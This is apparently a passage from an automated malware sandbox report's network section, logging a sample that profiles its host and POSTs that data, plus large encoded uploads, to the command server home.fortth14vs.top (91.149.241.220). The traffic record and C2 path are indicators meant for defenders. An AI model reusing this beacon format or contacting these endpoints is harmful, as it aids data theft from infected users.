                                  Dec 31, 2024 09:51:02.166060925 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166069984 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166078091 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166085958 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166109085 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166117907 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166126966 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166131020 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166213036 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166222095 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166229963 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166246891 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166254997 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166263103 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166273117 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.166285992 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170303106 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170312881 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170325041 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170334101 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170372963 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170388937 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170449018 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170458078 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170490980 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170500994 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170538902 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170547962 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170584917 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170628071 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:02.170664072 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170672894 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170681953 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170712948 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170723915 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170738935 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170747042 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170788050 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170797110 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170824051 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170833111 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170871973 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170881033 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170913935 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170922995 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170969963 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170979023 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.170994997 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171003103 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171041965 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171051025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171066046 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171077967 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171092033 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171101093 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171194077 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171204090 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171211958 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171221972 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171231985 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171241045 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171257019 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171266079 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171276093 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171283960 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171299934 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171308041 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171355009 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171365023 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.171374083 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175451994 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175519943 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175529957 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175569057 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175578117 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175595045 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175604105 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175661087 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175669909 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175681114 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175698042 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175781012 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175791025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175795078 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175883055 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175894022 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175942898 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175952911 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175968885 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.175977945 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176003933 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176012993 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176031113 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176040888 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176064014 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176073074 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176120043 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176129103 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176160097 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176168919 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176202059 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176212072 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176285028 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176294088 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176304102 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176314116 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176322937 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176364899 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176376104 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176383972 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:02.176388025 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356820107 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356867075 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.356987000 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.362962961 CET4970580192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.368421078 CET804970591.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.976355076 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.981169939 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:04.981251001 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.981556892 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:04.986330032 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.753937960 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.754304886 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:05.754369974 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:05.754492998 CET4970680192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:05.759243965 CET804970691.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:06.602132082 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.606991053 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:06.607110023 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.607353926 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:06.612076044 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422214031 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422230959 CET804970791.149.241.220192.168.2.8
                                  Dec 31, 2024 09:51:07.422489882 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:07.422844887 CET4970780192.168.2.891.149.241.220
                                  Dec 31, 2024 09:51:07.427649021 CET804970791.149.241.220192.168.2.8

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 31, 2024 09:50:58.631081104 CET6398153192.168.2.81.1.1.1
                                  Dec 31, 2024 09:50:58.631151915 CET6398153192.168.2.81.1.1.1
                                  Dec 31, 2024 09:50:58.638130903 CET53639811.1.1.1192.168.2.8
                                  Dec 31, 2024 09:50:58.638448954 CET53639811.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:01.001661062 CET6398453192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:01.001728058 CET6398453192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:01.615592003 CET53639841.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:01.638082981 CET53639841.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:04.726434946 CET6398653192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:04.726515055 CET6398653192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:04.819971085 CET53639861.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:04.975156069 CET53639861.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:05.812803984 CET6398853192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:05.812865019 CET6398853192.168.2.81.1.1.1
                                  Dec 31, 2024 09:51:06.426683903 CET53639881.1.1.1192.168.2.8
                                  Dec 31, 2024 09:51:06.601092100 CET53639881.1.1.1192.168.2.8

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 31, 2024 09:50:58.631081104 CET192.168.2.81.1.1.10xc884Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:50:58.631151915 CET192.168.2.81.1.1.10x9713Standard query (0)httpbin.org28IN (0x0001)false
                                  Dec 31, 2024 09:51:01.001661062 CET192.168.2.81.1.1.10xb7c3Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:01.001728058 CET192.168.2.81.1.1.10xb288Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                  Dec 31, 2024 09:51:04.726434946 CET192.168.2.81.1.1.10x746cStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:04.726515055 CET192.168.2.81.1.1.10xb9c9Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                  Dec 31, 2024 09:51:05.812803984 CET192.168.2.81.1.1.10xc5cdStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:05.812865019 CET192.168.2.81.1.1.10x4606Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 31, 2024 09:50:58.638448954 CET1.1.1.1192.168.2.80xc884No error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:50:58.638448954 CET1.1.1.1192.168.2.80xc884No error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:01.615592003 CET1.1.1.1192.168.2.80xb7c3No error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:04.975156069 CET1.1.1.1192.168.2.80x746cNo error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false
                                  Dec 31, 2024 09:51:06.601092100 CET1.1.1.1192.168.2.80xc5cdNo error (0)home.fortth14vs.top91.149.241.220A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • httpbin.org
                                  • home.fortth14vs.top

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.84970591.149.241.220805572C:\Users\user\Desktop\r8nllkNEQX.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 31, 2024 09:51:01.712446928 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
                                  Content-Type: application/json
                                  Content-Length: 442823
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 35 31 34 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8528974808643514482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                  Dec 31, 2024 09:51:01.717389107 CET2472OUTData Raw: 69 68 55 57 31 36 64 61 6a 4b 64 4f 61 76 70 65 4d 6d 66 6b 32 4e 77 4f 4f 79 33 45 31 4d 48 6d 4f 44 78 57 41 78 6c 46 70 56 73 4c 6a 63 50 57 77 75 4a 70 4e 71 36 56 53 68 58 68 54 71 77 62 54 75 6c 4b 4b 64 74 52 72 5c 2f 41 48 54 2b 48 38 78
                                  Data Ascii: ihUW16dajKdOavpeMmfk2NwOOy3E1MHmODxWAxlFpVsLjcPWwuJpNq6VShXhTqwbTulKKdtRr\/AHT+H8xUNWtrMM8\/U\/8A1zUb\/dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfrHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt5U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1I
                                  Dec 31, 2024 09:51:01.717407942 CET2472OUTData Raw: 38 67 36 43 48 4a 39 5c 2f 77 44 76 7a 5c 2f 38 41 58 71 47 54 5c 2f 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 48 70 2b 4f 4d 30 7a 79 2b 6e 7a 37 50 38 41 4a 37 44 46 42 58 5c 2f 4c 6e 5c 2f 74 30 71 53 4e 35 6d 5c 2f 35 77 5c 2f 77 43 39 5c
                                  Data Ascii: 8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+nz7P8AJ7DFBX\/Ln\/t0qSN5m\/5w\/wC9\/wCWQNR7nZdmf8\/X\/P50\/wDv\/J8mevm+vf8An\/Omf3H2Z\/e+b36f4f4UHXDb5\/oiHy9u\/wCR9vm\/8tB+H160z5\/lf\/XOf9b\/AJ\/z2qXnO\/8Aef55+1f1\/wDr02SM\/J8+HH+fzqJ7fP8ARm9Pr
                                  Dec 31, 2024 09:51:01.717442036 CET4944OUTData Raw: 6f 37 5c 2f 41 50 62 54 38 4b 41 49 46 6a 50 38 42 4f 38 52 6b 2b 5a 4a 5c 2f 77 43 32 6c 70 5c 2f 54 38 73 63 30 63 66 38 41 54 50 38 41 36 61 5c 2f 38 38 50 38 41 72 36 75 5c 2f 77 36 66 7a 78 55 30 63 63 6a 4e 74 5c 2f 64 73 38 66 70 6e 6f 4b
                                  Data Ascii: o7\/APbT8KAIFjP8BO8Rk+ZJ\/wC2lp\/T8sc0cf8ATP8A6a\/88P8Ar6u\/w6fzxU0ccjNt\/ds8fpnoKhj+aT+\/5faT15\/p71n7Pz\/D\/gmlPr8v1GfPHGkaPGP3tz+8\/wCe34+vr9MUZ\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8\/tH17e3\/wBc1maH7kP94\/h\/IU2nv1\/D+pp
                                  Dec 31, 2024 09:51:01.717459917 CET2472OUTData Raw: 76 58 36 5a 37 65 76 74 56 57 53 50 35 66 39 5a 39 65 63 5c 2f 77 43 66 38 69 67 30 70 39 66 6c 2b 6f 65 5a 5c 2f 77 44 62 65 33 55 5c 2f 6a 5c 2f 4c 70 2b 4e 51 79 4e 35 6e 58 50 2b 73 5c 2f 7a 36 2b 39 44 64 46 5c 2f 36 35 66 30 46 4d 2b 64 76
                                  Data Ascii: vX6Z7evtVWSP5f9Z9ec\/wCf8ig0p9fl+oeZ\/wDbe3U\/j\/Lp+NQyN5nXP+s\/z6+9DdF\/65f0FM+dvb9P\/r0Ggsm7O7Zs\/wC2WP8APrVXD43fxfTvjr69fbPepZO3+s7\/ANKbIr8p15\/1n+f06\/zoOvnfl\/XzK\/Od+z\/tnj9x\/wDq\/wA5zUHyfP8A6zv9P8\/0x2zVzyc\/6whv5fpVaSP72\/7\/AB6f5+uK
                                  Dec 31, 2024 09:51:01.717475891 CET2472OUTData Raw: 5c 2f 58 48 66 72 53 37 76 33 62 68 50 4d 33 78 78 66 77 52 66 58 5c 2f 50 38 41 58 6d 6e 52 5c 2f 77 42 7a 66 47 6e 6d 52 66 36 7a 5c 2f 6c 68 44 33 5c 2f 7a 5c 2f 41 44 46 4d 38 7a 39 35 76 33 79 66 6e 33 5c 2f 6e 31 37 56 52 30 45 4d 6b 66 6c
                                  Data Ascii: \/XHfrS7v3bhPM3xxfwRfX\/P8AXmnR\/wBzfGnmRf6z\/lhD3\/z\/ADFM8z95v3yfn3\/n17VR0EMkflbHTKJ\/6Jx9fT6cUPIjfOiRI8f7r\/W\/uJv6fXmn7vmjdF\/5ZXHHlH\/DNM2v8nl\/88vN\/wCeE\/5\/\/X6UAM8vzJEf7\/73\/j4jPr0uvz\/p0pnzwxwf6zZ\/pHleX\/19fj9t\/wA57VJJsjkm+SNE8rn
                                  Dec 31, 2024 09:51:01.717569113 CET4944OUTData Raw: 38 50 38 41 38 74 43 78 6b 5c 2f 69 77 50 61 50 43 66 67 50 53 50 67 74 2b 7a 76 34 4d 2b 46 66 39 74 4a 72 4f 6d 66 43 54 77 33 38 4c 50 41 59 31 5c 2f 55 37 65 44 54 6a 65 70 34 50 74 5c 2f 42 75 6c 32 65 72 58 64 75 30 30 39 74 59 33 46 77 6c
                                  Data Ascii: 8P8A8tCxk\/iwPaPCfgPSPgt+zv4M+Ff9tJrOmfCTw38LPAY1\/U7eDTjep4Pt\/Bul2erXdu009tY3FwlrbX5jS4lS2mkURzM0YauX\/a\/vrS\/\/AGO\/2ip7O5huoR8JvFSma3kWaIlvDkUw2yoWjcGKWN9yMy4Yc5BA\/ojIMxoy40yPA5ZTrywOJ8V8Pmf16rzxljMuecU45PGdCVClLD+zhWr4ipKT\/wBoljcPF0qLw
                                  Dec 31, 2024 09:51:01.717598915 CET2472OUTData Raw: 75 73 6e 38 66 2b 78 4a 2b 58 61 6e 74 73 65 4f 62 66 35 69 65 5a 5c 2f 77 42 73 4d 66 35 5c 2f 2b 76 6b 55 2b 50 38 41 65 65 71 50 5c 2f 77 41 73 6f 35 49 73 66 35 5c 2f 48 33 6f 41 70 79 66 33 6b 2b 76 6c 66 6d 63 66 79 36 66 6c 33 71 54 7a 45
                                  Data Ascii: usn8f+xJ+XantseObf5ieZ\/wBsMf5\/+vkU+P8AeeqP\/wAso5Isf5\/H3oApyf3k+vlfmcfy6fl3qTzEEn+p8maf97n\/AF3HX\/RMZ\/zx6U7dtkTZNG6fn\/jn+mKhWQx+czpJ+8\/59\/8An3Hf\/wDV2rT2nl+P\/AAbJjy9++R383\/VyS\/uOnP\/ANcev6ofL8z+\/wD9sv8AU8f5\/M09f9yT38z9x\/ng+3NHyyN
                                  Dec 31, 2024 09:51:01.717612028 CET2472OUTData Raw: 2b 73 61 58 34 73 6c 2b 46 43 61 66 34 69 38 46 5c 2f 59 66 6a 44 38 4c 74 59 2b 4d 76 68 72 78 46 4c 72 47 75 78 2b 46 39 4d 2b 48 76 68 50 55 50 69 50 59 65 50 39 66 38 53 61 6e 50 34 53 67 76 62 53 33 2b 48 58 5c 2f 43 70 76 48 74 33 34 77 66
                                  Data Ascii: +saX4sl+FCaf4i8F\/YfjD8LtY+MvhrxFLrGux+F9M+HvhPUPiPYeP9f8SanP4SgvbS3+HX\/CpvHt34wfSNK1yK0stBuJtMl1YvCkn5Xg\/G\/wjx8HUwvHuR1IRo1cRJzqV6HLQo5VPPZ1ZKvRpNQlktOWb0W0vrGWuGNw\/tcPVpVJ\/tGM+jn445fFzxXhpxLCCr5fhnOnQw2Iiq+Z5m8lwdK+GxVZOpUzeM8snFO+HxtOr
                                  Dec 31, 2024 09:51:01.722313881 CET2472OUTData Raw: 39 34 38 49 6b 74 56 30 65 31 38 4b 2b 4a 50 43 64 79 2b 73 4e 71 4f 6f 33 75 6d 61 5a 2b 4f 2b 4a 47 66 65 41 66 69 70 77 74 52 79 5c 2f 69 76 6a 44 42 59 76 49 38 76 34 74 6f 55 61 4d 38 70 78 2b 4c 70 59 6a 5c 2f 57 62 44 77 78 32 54 30 73 48
                                  Data Ascii: 948IktV0e18K+JPCdy+sNqOo3umaZ+O+JGfeAfipwtRy\/ivjDBYvI8v4toUaM8px+LpYj\/WbDwx2T0sHTWEw9bEYmUpZhicHGFOjVo1cVUp0qc5V1CJ\/QXhRwz9J\/wS40zHM+DfD7Msu4kr8GYt5nTz3K8FVwuF4VrZlkuMxWLxksdicPhcvdHGYbKqlWWJxFDEYehPnq044epOZ++X\/D9c\/9Gsj\/AMPh\/wDigo\/4f
                                  Dec 31, 2024 09:51:01.722337008 CET2472OUTData Raw: 66 77 34 71 48 38 39 2b 66 38 2b 32 4d 66 35 78 55 38 76 66 5c 2f 41 48 66 38 61 67 37 5c 2f 41 4e 5c 2f 38 2b 50 35 69 73 54 6f 42 2b 76 34 66 31 4e 56 33 36 5c 2f 68 55 74 51 53 66 39 38 66 35 5c 2f 77 41 2b 5c 2f 76 51 64 42 58 59 50 5c 2f 63
                                  Data Ascii: fw4qH89+f8+2Mf5xU8vf\/AHf8ag7\/AN\/8+P5isToB+v4f1NV36\/hUtQSf98f5\/wA+\/vQdBXYP\/c+T\/pnn19vw\/wA5pjZ7+o6f6\/p296sJ90fj\/M1FJH\/f\/wC2v+evc\/5AoNPrP9W\/+1Gbj\/vnv\/8AXx+lVpI\/m+5vfzf+ev6d\/wDHp2qz93Zv+fj\/AFkf+o\/yPzpm35n\/AI0\/z+f59\/fkOmG3z\
                                  Dec 31, 2024 09:51:04.356820107 CET157INHTTP/1.1 200 OK
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:04 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 1
                                  Connection: close
                                  Data Raw: 30
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.84970691.149.241.220805572C:\Users\user\Desktop\r8nllkNEQX.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 31, 2024 09:51:04.981556892 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                  Host: home.fortth14vs.top
                                  Accept: */*
                                  Dec 31, 2024 09:51:05.753937960 CET372INHTTP/1.1 404 NOT FOUND
                                  Server: nginx/1.22.1
                                  Date: Tue, 31 Dec 2024 08:51:05 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 207
                                  Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.84970791.149.241.220805572C:\Users\user\Desktop\r8nllkNEQX.exe
